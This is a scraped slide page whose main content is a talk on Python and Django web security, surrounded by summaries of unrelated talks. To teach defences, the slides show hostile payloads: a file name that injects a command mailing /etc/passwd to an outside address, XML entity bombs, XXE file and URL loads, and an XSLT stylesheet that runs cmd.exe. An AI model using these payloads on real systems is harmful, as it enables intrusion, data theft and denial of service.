Adversary simulation in cloud environments has unique characteristics and therefore requires a dedicated approach. Stratus offers flexibility in running attack simulations natively in cloud environments. This presentation will explain the use of Stratus in adversary simulation and how to develop custom scenarios as needed.
Chromium Sandbox on Linux (NDC Security 2019) - Patricia Aas
The Linux Security and Isolation APIs have become the basis of some of the most useful features server-side, providing the isolation required for efficient containers.
However, these APIs also form the basis of the Chromium Sandbox on Linux, and we will study them in that context in this talk.
The document discusses weaknesses in random number generation and pseudorandom number generation (PRNG) that can be exploited by attackers. It provides examples of programs that used weak PRNGs, allowing session IDs and keys to be guessed. Lessons learned are that numbers used to derive keys and IDs must be truly random and unpredictable, and PRNGs must be cryptographically secure. Two types of randomness are defined: true randomness from unpredictable sources, and pseudorandomness from cryptographically secure PRNGs seeded with true randomness.
PyCon AU 2012 - Debugging Live Python Web Applications - Graham Dumpleton
Monitoring tools record the result of what happened to your web application when a problem arises, but for some classes of problems, monitoring systems are only a starting point. Sometimes it is necessary to take more intrusive steps to plan for the unexpected by embedding mechanisms that will allow you to interact with a live deployed web application and extract even more detailed information.
This document provides guidance on sharing reproducible R code projects using version control with Git and GitHub. It discusses configuring Git and RStudio to work together, organizing R projects, publishing projects on GitHub, and tips for making code more shareable. Version control with Git allows tracking changes, collaboration, and recovering from issues like computer crashes. Following standards for coding style, documentation, and packaging environments helps ensure projects are reproducible.
This document discusses hacking serverless runtime environments like AWS Lambda, Azure Functions, and Auth0 WebTask. It begins by introducing the presenters and what will be covered. The document then explores how different vendors implement sandbox isolation and common attack techniques like persistence and data exfiltration. It examines specific runtimes like AWS Lambda in depth, investigating how to profile the environment, persist code, and escalate privileges. The document emphasizes that detection is difficult in serverless environments and provides examples of potential indicators of compromise. Overall, the document provides an overview of attacking and defending serverless architectures.
DDD17 - Web Applications Automated Security Testing in a Continuous Delivery... - Fedir RYKHTIK
Slides from "Web Applications Automated Security Testing in a Continuous Delivery Pipeline" workshop, made during Drupal Developers Days 2017 at Seville, Spain
The document discusses OWASP Zed Attack Proxy (ZAP), a free and open source web application security scanner. It can be used by pentesters, developers, and testers to detect vulnerabilities. ZAP passively and actively scans applications to find issues. It can be integrated into CI/CD pipelines and automated with APIs, command line tools, and programming libraries. The document provides examples of using ZAP to perform passive scanning, active scanning, and automation for testers.
Talk from Embedded Linux Conference, http://elcabs2015.sched.org/event/551ba3cdefe2d37c478810ef47d4ca4c?iframe=no&w=i:0;&sidebar=yes&bg=no#.VRUCknSQQQs
Unmasking Careto through Memory Forensics (video in description) - Andrew Case
My presentation from SecTor 2014 on analyzing the sophisticated Careto malware with memory forensics & Volatility
Video here: http://2014.video.sector.ca/video/110388398
Kommons is a collection of reusable Java classes for J2ME applications. It includes classes for logging, working with ISO date/time formats, HTTP networking, Bluetooth communication, caching objects to RMS, and more. The goals of Kommons are to provide classes that are stable, easy to use, well tested, and open source. Future work includes improving documentation, testing, and integrating other useful projects.
Node is used to build a reverse proxy to provide secure access to internal web resources and sites for mobile clients within a large enterprise. Performance testing shows the proxy can handle over 1000 requests per second with latency under 1 second. Code quality analysis tools like Plato and testing frameworks like Jest are useful for maintaining high quality code. Scalability is achieved through auto-scaling virtual machine instances with a load balancer and configuration management.
Honeynet Project Workshop 2014 - Thug: a low-interaction honeyclient - Angelo Dell'Aera
This document summarizes Thug, a low-interaction honeyclient for analyzing client-side attacks. It discusses how Thug emulates browser behavior and plugins to appear as a real browser. Thug uses the V8 JavaScript engine and supports logging and analyzing events using various formats. The document outlines Thug's DOM emulation, event handling, browser personalities, vulnerabilities modules and classifiers for detecting exploit kits.
Waf.js: How to Protect Web Applications using JavaScript - Denis Kolegov
The document discusses techniques for protecting web applications from client-side attacks using JavaScript (Waf.js).
Waf.js provides defenses like CSRF prevention, DOM-based XSS prevention, and detection of unwanted applications. It utilizes parsers like Acorn and DOMPurify to parse and sanitize inputs to prevent injections. The document outlines approaches used by Waf.js to build the AST of an input and search for dangerous code like function calls to prevent attacks while minimizing false positives.
A talk presented at the Automotive Grade Linux All-Members meeting on September 8, 2015. The focus on why AGL should adopt systemd, and highlights two of the more difficult integration issues that may arise while doing so. The embedded SVG image, courtesy Marko Hoyer of ADIT, is at http://she-devel.com/2015-07-23_amm_demo.svg
Similar to Web application security and Python security best practices (20)
HCL Notes and Domino License Cost Reduction in the World of DLAU - panagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-und-domino-lizenzkostenreduzierung-in-der-welt-von-dlau/
DLAU and the licenses under the CCB and CCX model have been a hot topic for many in the HCL community since last year. As a Notes or Domino customer, you may be struggling with unexpectedly high user counts and license fees. You may be wondering how this new kind of licensing works and what benefit it brings you. Above all, you surely want to stay within your budget and save costs wherever possible. We understand that, and we would like to help you with it!
We explain how to resolve common configuration problems that can lead to more users being counted than necessary, and how to identify and remove superfluous or unused accounts to save money. There are also some approaches that can lead to unnecessary expenses, e.g. when a person document is used instead of a mail-in for shared mailboxes. We show you such cases and their solutions. And of course we explain the new licensing model.
Join this webinar, in which HCL Ambassador Marc Thomas and guest speaker Franz Walder introduce you to this new world. It gives you the tools and the know-how to keep track of things. You will be able to reduce your costs through an optimized Domino configuration and keep them low in the future.
These topics will be covered
- Reducing license costs by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how best to use it
- Tips for common problem areas, such as team mailboxes, functional/test users, etc.
- Practical examples and best practices to implement right away
Communications Mining Series - Zero to Hero - Session 1 - DianaGray10
This session provides an introduction to UiPath Communication Mining, its importance and a platform overview. You will acquire a good understanding of the phases in Communication Mining as we go over the platform with you. Topics covered:
• Communication Mining Overview
• Why is it important?
• How can it help today’s business and the benefits
• Phases in Communication Mining
• Demo on Platform overview
• Q/A
In the rapidly evolving landscape of technologies, XML continues to play a vital role in structuring, storing, and transporting data across diverse systems. The recent advancements in artificial intelligence (AI) present new methodologies for enhancing XML development workflows, introducing efficiency, automation, and intelligent capabilities. This presentation will outline the scope and perspective of utilizing AI in XML development. The potential benefits and the possible pitfalls will be highlighted, providing a balanced view of the subject.
We will explore the capabilities of AI in understanding XML markup languages and autonomously creating structured XML content. Additionally, we will examine the capacity of AI to enrich plain text with appropriate XML markup. Practical examples and methodological guidelines will be provided to elucidate how AI can be effectively prompted to interpret and generate accurate XML markup.
Further emphasis will be placed on the role of AI in developing XSLT, or schemas such as XSD and Schematron. We will address the techniques and strategies adopted to create prompts for generating code, explaining code, or refactoring the code, and the results achieved.
The discussion will extend to how AI can be used to transform XML content. In particular, the focus will be on the use of AI XPath extension functions in XSLT, Schematron, Schematron Quick Fixes, or for XML content refactoring.
The presentation aims to deliver a comprehensive overview of AI usage in XML development, providing attendees with the necessary knowledge to make informed decisions. Whether you’re at the early stages of adopting AI or considering integrating it in advanced XML development, this presentation will cover all levels of expertise.
By highlighting the potential advantages and challenges of integrating AI with XML development tools and languages, the presentation seeks to inspire thoughtful conversation around the future of XML development. We’ll not only delve into the technical aspects of AI-powered XML development but also discuss practical implications and possible future directions.
GraphSummit Singapore | The Future of Agility: Supercharging Digital Transfor... - Neo4j
Leonard Jayamohan, Partner & Generative AI Lead, Deloitte
This keynote will reveal how Deloitte leverages Neo4j’s graph power for groundbreaking digital twin solutions, achieving a staggering 100x performance boost. Discover the essential role knowledge graphs play in successful generative AI implementations. Plus, get an exclusive look at an innovative Neo4j + Generative AI solution Deloitte is developing in-house.
UiPath Test Automation using UiPath Test Suite series, part 6 - DianaGray10
Welcome to UiPath Test Automation using UiPath Test Suite series part 6. In this session, we will cover Test Automation with generative AI and Open AI.
UiPath Test Automation with generative AI and Open AI webinar offers an in-depth exploration of leveraging cutting-edge technologies for test automation within the UiPath platform. Attendees will delve into the integration of generative AI, a test automation solution, with Open AI advanced natural language processing capabilities.
Throughout the session, participants will discover how this synergy empowers testers to automate repetitive tasks, enhance testing accuracy, and expedite the software testing life cycle. Topics covered include the seamless integration process, practical use cases, and the benefits of harnessing AI-driven automation for UiPath testing initiatives. By attending this webinar, testers, and automation professionals can gain valuable insights into harnessing the power of AI to optimize their test automation workflows within the UiPath ecosystem, ultimately driving efficiency and quality in software development processes.
What will you get from this session?
1. Insights into integrating generative AI.
2. Understanding how this integration enhances test automation within the UiPath platform
3. Practical demonstrations
4. Exploration of real-world use cases illustrating the benefits of AI-driven test automation for UiPath
Topics covered:
What is generative AI
Test Automation with generative AI and Open AI.
UiPath integration with generative AI
Speaker:
Deepak Rai, Automation Practice Lead, Boundaryless Group and UiPath MVP
“An Outlook of the Ongoing and Future Relationship between Blockchain Technologies and Process-aware Information Systems.” Invited talk at the joint workshop on Blockchain for Information Systems (BC4IS) and Blockchain for Trusted Data Sharing (B4TDS), co-located with the 36th International Conference on Advanced Information Systems Engineering (CAiSE), 3 June 2024, Limassol, Cyprus.
Unlocking Productivity: Leveraging the Potential of Copilot in Microsoft 365, a presentation by Christoforos Vlachos, Senior Solutions Manager – Modern Workplace, Uni Systems
Unlock the Future of Search with MongoDB Atlas_ Vector Search Unleashed.pdf - Malak Abu Hammad
Discover how MongoDB Atlas and vector search technology can revolutionize your application's search capabilities. This comprehensive presentation covers:
* What is Vector Search?
* Importance and benefits of vector search
* Practical use cases across various industries
* Step-by-step implementation guide
* Live demos with code snippets
* Enhancing LLM capabilities with vector search
* Best practices and optimization strategies
Perfect for developers, AI enthusiasts, and tech leaders. Learn how to leverage MongoDB Atlas to deliver highly relevant, context-aware search results, transforming your data retrieval process. Stay ahead in tech innovation and maximize the potential of your applications.
#MongoDB #VectorSearch #AI #SemanticSearch #TechInnovation #DataScience #LLM #MachineLearning #SearchTechnology
HCL Notes and Domino License Cost Reduction in the World of DLAUpanagenda
Webinar Recording: https://www.panagenda.com/webinars/hcl-notes-and-domino-license-cost-reduction-in-the-world-of-dlau/
The introduction of DLAU and the CCB & CCX licensing model caused quite a stir in the HCL community. As a Notes and Domino customer, you may have faced challenges with unexpected user counts and license costs. You probably have questions on how this new licensing approach works and how to benefit from it. Most importantly, you likely have budget constraints and want to save money where possible. Don’t worry, we can help with all of this!
We’ll show you how to fix common misconfigurations that cause higher-than-expected user counts, and how to identify accounts which you can deactivate to save money. There are also frequent patterns that can cause unnecessary cost, like using a person document instead of a mail-in for shared mailboxes. We’ll provide examples and solutions for those as well. And naturally we’ll explain the new licensing model.
Join HCL Ambassador Marc Thomas in this webinar with a special guest appearance from Franz Walder. It will give you the tools and know-how to stay on top of what is going on with Domino licensing. You will be able lower your cost through an optimized configuration and keep it low going forward.
These topics will be covered
- Reducing license cost by finding and fixing misconfigurations and superfluous accounts
- How do CCB and CCX licenses really work?
- Understanding the DLAU tool and how to best utilize it
- Tips for common problem areas, like team mailboxes, functional/test users, etc
- Practical examples and best practices to implement right away
Goodbye Windows 11: Make Way for Nitrux Linux 3.5.0!SOFTTECHHUB
As the digital landscape continually evolves, operating systems play a critical role in shaping user experiences and productivity. The launch of Nitrux Linux 3.5.0 marks a significant milestone, offering a robust alternative to traditional systems such as Windows 11. This article delves into the essence of Nitrux Linux 3.5.0, exploring its unique features, advantages, and how it stands as a compelling choice for both casual users and tech enthusiasts.
6. Made with by PGS Software · 6
Few words on start
● 30 bugs per 100 lines - ticket machine printed ticket for 638 zł for 2 zł, Mars (metric units)
● Hacker - was a good programmer, now it’s a student from high school
● Attackers: competition, own employee, casual internet surfer, government
● Aim of attacker: hack website, stealing information, injecting malicious software, man, algorithm, metadata in Word documents
● Tools - www.shodan.io and many others...
7. Input injection
Piece of bad code - code that compresses the file with the given name:

    import subprocess

    def compress_file(request, filename):
        # filename is pasted into the shell command line unescaped
        command = 'tar cfvz output_file.rar.gz "{source}"'.format(source=filename)
        subprocess.call(command, shell=True)

Exploit - command in file name:

    "|| cat /etc/passwd | mail them@domain.com
8. Input injection - solution
● Never trust the user or an unknown source
● Use the shlex library for shell operations
● Use shlex.quote to add quotes and prevent execution
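The difference shlex.quote makes, as an added example that is not part of the original slides. `echo` stands in for `tar` so the result is visible; the hostile file name is a constructed, harmless one, and all function names are hypothetical.

```python
import shlex
import subprocess

# Constructed, harmless stand-in for a hostile file name: it closes the
# double quote from the command template and chains further commands.
HOSTILE_NAME = 'report.txt"; echo INJECTED; echo "'


def vulnerable_command(filename):
    """The slide's pattern (echo stands in for tar): raw name in a shell string."""
    return 'echo "{source}"'.format(source=filename)


def quoted_command(filename):
    """Same template, but shlex.quote turns the name into one shell word."""
    return "echo {source}".format(source=shlex.quote(filename))


def run_shell(command):
    """Run a command line through the shell and return its stdout lines."""
    done = subprocess.run(command, shell=True, capture_output=True, text=True)
    return done.stdout.splitlines()


def compress_file(filename, archive="output_file.rar.gz"):
    """Hardened variant of the slide's function: argv list, no shell.

    "--" ends option parsing, so a name starting with "-" stays a file name.
    """
    return subprocess.call(["tar", "cfvz", archive, "--", filename])


if __name__ == "__main__":
    print(run_shell(vulnerable_command(HOSTILE_NAME)))  # injected echo runs
    print(run_shell(quoted_command(HOSTILE_NAME)))      # name printed verbatim
```

Passing an argument list without `shell=True`, as `compress_file` does here, removes the shell from the picture entirely; quoting is only needed when a shell string cannot be avoided.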
9. Parsing XML – issues
● Bypass firewall and gain access to restricted resources
● Abuse a service to attack, spy on, DoS servers or third party services
● Exhaust additional resources on the machine (e.g. service that doesn’t respond or responds with a big file)
● Gain knowledge of when, how often and from which IP address a document is accessed
● Send email from inside the network if the URL handler supports smtp URIs
10. Parsing XML – Billion laughs/exponential entity expansion
Exploit - XML entity recursion:

    <!DOCTYPE xmlbomb [
    <!ENTITY a "1234567890" >
    <!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
    <!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
    <!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
    ]>
    <bomb>&d;</bomb>
11. Parsing XML – quadratic blowup entity expansion
Exploit - one big entity repeated many times:

    <!DOCTYPE bomb [
    <!ENTITY a "xxxxxxx... a couple of ten thousand chars">
    ]>
    <bomb>&a;&a;&a;... repeat</bomb>
12. Parsing XML – external entity expansion (remote/local)
Exploit - load entity from storage or server:

    <!DOCTYPE external [
    <!ENTITY ee SYSTEM "http://www.python.org/some.xml">
    ]>
    <root>&ee;</root>

    <!DOCTYPE external [
    <!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
    ]>
    <root>&ee;</root>
13. Parsing XML – DTD retrieval
Exploit - reference to document definition:

    <?xml version="1.0" encoding="utf-8"?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html>
    <head/>
    <body>text</body>
    </html>
14. Parsing XML – issues
● XML parsers may use an O(n^2) algorithm to handle attributes and namespaces.
● Parsers which use hash tables for storing attributes and namespaces – the implementation may be vulnerable to hash collision attacks and performance can go to O(n^2) again.
15. Parsing XML – decompression bomb
● XML libraries can parse compressed XML streams like HTTP streams or LZMA-ed files.
● Gzip can compress 1GiB of zeros to 1MB and LZMA can be even better
● Only xmlrpclib can decompress streams, so it is vulnerable
● Lxml can load and process compressed data. It can handle very large blobs of compressed data without using too much memory. It is not protected from decompression bombs.
● SAX library is the safest
16. Parsing XML – processing instruction
Exploit - processing instruction:

    <?xml-stylesheet type="text/xsl" href="style.xsl"?>
17. Parsing XML – XPath injection
● Works the same as SQL injection
● XPath queries must be quoted and validated (especially when taken from the user)
● Python’s standard library doesn’t have XPath queries and proper quoting. Use the xpath() method correctly:

    tree.xpath("/tag[@id='%s']" % value)  # BAD
    tree.xpath("/tag[@id=$tagid]", tagid=name)  # GOOD
18. Parsing XML - XInclude

    <root xmlns:xi="http://www.w3.org/2001/XInclude">
    <xi:include href="filename.txt" parse="text" />
    </root>

We should not do that when we use files from untrusted sources.
Libxml2 supports XInclude but does not have an option to limit access only to allowed directories.
19. Parsing XML – XML Schema location
Exploit - XML schema location:

    <ead xmlns="urn:isbn:1-931666-22-9"
         xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="urn:isbn:1-931666-22-9 http://www.loc.gov/ead/ead.xsd">
    </ead>
20. Parsing XML – XSL
XSLT is a language for transforming XML documents into other XML or HTML documents.
XSLT processors can interact with external resources, for example: read/write to the file system, access to JRE objects, scripting with Jython.
21. Parsing XML – XSL Transformation
Exploit - XSL which runs cmd:

    <xsl:stylesheet version="1.0"
        xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
        xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime"
        xmlns:ob="http://xml.apache.org/xalan/java/java.lang.Object"
        exclude-result-prefixes="rt ob">
      <xsl:template match="/">
        <xsl:variable name="runtimeObject" select="rt:getRuntime()"/>
        <xsl:variable name="command"
            select="rt:exec($runtimeObject, 'c:\Windows\system32\cmd.exe')"/>
        <xsl:variable name="commandAsString" select="ob:toString($command)"/>
        <xsl:value-of select="$commandAsString"/>
      </xsl:template>
    </xsl:stylesheet>
22. Parsing XML - Summary
1. Lxml is protected against billion laughs attacks. No network lookups.
2. libxml2 and lxml are not directly vulnerable to gzip decompression bombs. No explicit protection against them.
3. xml.etree doesn’t expand entities. Raises a ParserError when an entity appears.
4. minidom doesn’t expand entities and simply returns the notification that it cannot expand the entity.
23. Parsing XML - Summary
5. genshi.input from genshi 0.6 doesn’t support entity expansion. It raises a ParserError when an entity appears.
6. Library has XInclude support – remember to set a limit
7. Features but they may be exploitable holes
25. Parsing XML
kind                  sax   etree           minidom  pulldom  xmlrpc      lxml            genshi
gzip bomb             Safe  Safe            Safe     Safe     Vulnerable  Partly (2)      Safe
XPath support (7)     Safe  Safe            Safe     Safe     Safe        Vulnerable      Safe
xsl(t) support (7)    Safe  Safe            Safe     Safe     Safe        Vulnerable      Safe
XInclude support (7)  Safe  Vulnerable (6)  Safe     Safe     Safe        Vulnerable (6)  Vulnerable
26. Parsing XML – what we can do?
Use the defusedxml library, which is secure:

    >>> from xml.etree.ElementTree import parse  # BAD!
    >>> et = parse(xmlfile)

    >>> from defusedxml.ElementTree import parse  # GOOD!
    >>> et = parse(xmlfile)

All functions and parser classes accept additional arguments and return the original objects.
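A standard-library sketch of refusing entity and DTD declarations before a document reaches ElementTree, run against the documents from the slides above. This is an added example, not code from the talk or from defusedxml; `ForbiddenXML`, `check_xml`, `safe_fromstring` and `verdict` are hypothetical names, and `DTD_ONLY` and `BENIGN` are constructed inputs.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat

class ForbiddenXML(ValueError):
    """The document uses a construct this parser refuses to process."""

def _reject(kind):
    def handler(*_args):
        raise ForbiddenXML(kind)
    return handler

def check_xml(data, forbid_dtd=False):
    """Scan with expat; raise at the first declaration, before any expansion."""
    scanner = expat.ParserCreate()
    if forbid_dtd:
        scanner.StartDoctypeDeclHandler = _reject("DOCTYPE declaration")
    scanner.EntityDeclHandler = _reject("entity declaration")
    scanner.UnparsedEntityDeclHandler = _reject("unparsed entity declaration")
    scanner.ExternalEntityRefHandler = _reject("external entity reference")
    scanner.Parse(data, True)

def safe_fromstring(data, forbid_dtd=False):
    """Hand the bytes to ElementTree only after check_xml accepted them."""
    check_xml(data, forbid_dtd)
    return ET.fromstring(data)

def verdict(data, forbid_dtd=False):
    """Return the root tag, or the reason the document was rejected."""
    try:
        return safe_fromstring(data, forbid_dtd).tag
    except ForbiddenXML as exc:
        return "rejected: " + str(exc)

# The first two documents are the ones shown on the slides.
BILLION_LAUGHS = b"""<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>"""
EXTERNAL_ENTITY = b"""<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>"""
DTD_ONLY = b'<!DOCTYPE note SYSTEM "note.dtd"><note>text</note>'  # constructed
BENIGN = b"<note><to>ops</to></note>"                             # constructed
```

With `forbid_dtd=True` even a bare DOCTYPE is refused, which also covers the DTD retrieval case.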
27. Assert statements
● Never use assert statements to protect a piece of code from execution
● By default Python runs with __debug__ set to True. In production it is common to run the application with optimizations, and this option causes assert statements to be skipped!
● Use asserts only in tests
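What the optimization flag does to an assert-based guard, as an added example that is not part of the original slides. The child program and its function names are constructed; it is run once normally and once with `-O`.

```python
import subprocess
import sys

# Constructed child program: the first function relies on assert as its
# access check, the second uses an explicit check that always runs.
CHILD = '''
def delete_with_assert(user):
    assert user == "admin", "not allowed"
    return "deleted"

def delete_with_check(user):
    if user != "admin":
        raise PermissionError("not allowed")
    return "deleted"

for func in (delete_with_assert, delete_with_check):
    try:
        print(func.__name__, func("guest"))
    except (AssertionError, PermissionError):
        print(func.__name__, "blocked")
'''


def run_child(optimized):
    """Run CHILD in a fresh interpreter and map function name -> outcome.

    -I isolates the child from environment variables such as PYTHONOPTIMIZE.
    """
    args = [sys.executable, "-I"] + (["-O"] if optimized else []) + ["-c", CHILD]
    out = subprocess.run(args, capture_output=True, text=True, check=True).stdout
    return dict(line.split() for line in out.splitlines())


if __name__ == "__main__":
    print("default:", run_child(optimized=False))
    print("with -O:", run_child(optimized=True))
```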
28. Timing attacks
● The attack is aimed at an algorithm which compares provided values.
● E.g. in a command line application which prompts for the password
● We can prevent this attack by using: secrets.compare_digest (Python 3.5)
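Why an ordinary comparison leaks, as an added example that is not part of the original slides. The step counter is a deterministic stand-in for elapsed time; the function names and token values are constructed.

```python
import secrets


def early_exit_equals(expected, supplied):
    """Naive byte-by-byte comparison that stops at the first mismatch.

    Returns (match, steps); steps grows with the length of the correct
    prefix, which is exactly what a timing measurement would reveal.
    """
    if len(expected) != len(supplied):
        return False, 0
    steps = 0
    for left, right in zip(expected, supplied):
        steps += 1
        if left != right:
            return False, steps
    return True, steps


def verify_token(expected, supplied):
    """The check named on the slide: running time does not depend on
    where the first differing byte is."""
    return secrets.compare_digest(expected, supplied)


# Constructed sample values.
REAL_TOKEN = b"s3cr3t-token"
WRONG_FROM_START = b"xxxxxxxxxxxx"
WRONG_AFTER_PREFIX = b"s3cr3t-xxxxx"

if __name__ == "__main__":
    for guess in (WRONG_FROM_START, WRONG_AFTER_PREFIX, REAL_TOKEN):
        print(guess, early_exit_equals(REAL_TOKEN, guess), verify_token(REAL_TOKEN, guess))
```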
29. Installing 3rd party packages
● It is not recommended to use 3rd party packages in global site-packages
● Sometimes a malicious package with a very similar name but different code appears on PyPI for popular packages.
● It is important to remember about dependencies of dependencies. They can contain vulnerabilities which can change the behavior of Python via the import system
30. Temporary files
● Generally, creating temporary files can be accomplished with the mktemp() function
● It is not secure because a different file system can create a file with this name. In the end the application can be fed with different configuration data.
● Use the tempfile module and its mkstemp() function, which can handle those cases.
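The gap between choosing a name and creating the file, as an added example that is not part of the original slides. The race is simulated deterministically inside one process; all function names are hypothetical.

```python
import os
import tempfile


def write_plain(path, data):
    """mktemp-style use: the name was chosen earlier, the file is opened now."""
    with open(path, "w") as handle:
        handle.write(data)


def write_exclusive(path, data):
    """O_EXCL makes creation fail if anything already exists at path."""
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "w") as handle:
        handle.write(data)


def write_mkstemp(data, directory):
    """mkstemp picks the name and creates the file in one step, mode 0600."""
    fd, path = tempfile.mkstemp(dir=directory)
    with os.fdopen(fd, "w") as handle:
        handle.write(data)
    return path


def simulate_race(directory):
    """Constructed scenario: someone else creates the chosen name first."""
    name = tempfile.mktemp(dir=directory)   # only a name, nothing is created
    with open(name, "w") as other:          # the other party gets there first
        other.write("planted")
    outcome = {}
    write_plain(name, "mine")               # no error: reuses the foreign file
    outcome["plain_open"] = "reused existing file"
    try:
        write_exclusive(name, "mine")
        outcome["exclusive"] = "written"
    except FileExistsError:
        outcome["exclusive"] = "refused"
    safe_path = write_mkstemp("mine", directory)
    outcome["mkstemp_new_file"] = safe_path != name
    outcome["mkstemp_mode"] = oct(os.stat(safe_path).st_mode & 0o777)
    return outcome


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as workdir:
        print(simulate_race(workdir))
```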
31. Using yaml.load
● The YAML documentation underlines that it is not safe to call yaml.load on any data received from an untrusted source. - https://www.talosintelligence.com/reports/TALOS-2017-0305
● Instead use yaml.safe_load
32. Pickles
● pickle.load is not good, the same as yaml.load.
● Never load a pickle from an untrusted source
● Better to use a different serialization pattern like JSON
33. Not patching system Python runtime
● Python interpreter is written in C
● Common security issues in C for Python are related to the allocation of memory, so buffer overflows can appear. - https://www.cvedetails.com/cve/CVE-2017-1000158/
● Install the latest version of Python for the production environment and always patch it
34. Not patching dependencies
● It is very important to patch dependencies and their dependencies - which can be hard because of dependency hell, but that is no excuse!
● You can use a service like PyUp.io to check for updates
● It is wise to validate all your library versions - https://www.inspec.io/docs/reference/resources/pip/
● All of the above issues can be found by bandit - https://github.com/PyCQA/bandit
35. Django security features
● XSS Protection – jsfuck.com, white list, black list
● CSRF Protection (is checking referer header, generates token for form)
● Injection Protection
● Clickjacking Protection – SAMEORIGIN, DENY. Support: IE 8+, FF 3.6.9+, Opera 10.5+, Safari 4+, Chrome 4.1+
● SSL/HTTPS – SESSION_COOKIE_SECURE=True, CSRF_COOKIE_SECURE=True, django-sslify, django-secure
36. Django security features
● Password Storage, bcrypt!
● Data Validation
● OAuth2 with django-rest-framework - https://django-oauth-toolkit.readthedocs.io/en/latest/rest-framework/getting_started.html
37. Django practices
● Always deploy your Django project behind https.
● Change the default url to admin
● For the admin url use django-admin-honeypot - https://github.com/dmpayton/django-admin-honeypot
● Require stronger passwords – https://github.com/Pawamoy/django-zxcvbn-password
● Use at least two factor authentication. Token is most recommended.
38. Django practices
● Use the latest version of Django
● Never run debug in production – transparent errors, cached sql queries
● Check for errors: python manage.py check --deploy
● You can also check the security of your website on https://www.ponycheckup.com/
39. Django practices
● Distinguish environments
● Deploy admin inside VPN
● Remove unnecessary components from the main site
● Define allowed hosts
● Protect your secret key
40. Other best practices
● Harden your servers
● Never store credit card data
● Server monitoring
● Vulnerability reporting page
● KEEP THINGS UP TO DATE
41. Other best practices
● Secured not only on the client's side
● Buffer overflows do not occur in Java, but data can be passed to a program written in a different language, where the problem can appear.
42. OWASP TOP 10
● Injection
● Broken Authentication
● Sensitive Data Exposure
● XML External Entities
● Broken Access Control
● Security Misconfiguration
● Cross-Site Scripting
● Insecure Deserialization
● Using Components with Known Vulnerabilities
● Insufficient Logging & Monitoring
43. Interesting topics
● https://www.vulnhub.com/entry/lab26-11,190/#download - website with images where you can exploit backdoors
● https://django-oauth-toolkit.readthedocs.io/en/latest/rest-framework/getting_started.html - OAuth with django-rest-framework
● https://github.com/Phype/telnet-iot-honeypot - telnet honeypot
44. Interesting topics
● https://medium.com/@mccode/processes-in-containers-should-not-run-as-root-2feae3f0df3b - docker containers – issues related to docker images
● https://github.com/TheSecondSun/Safari-Crash - How to crash Safari with HTML exploits (DoS)
● https://stackoverflow.com/questions/9580575/how-to-manually-set-referer-header-in-javascript - How to change the referer header with JS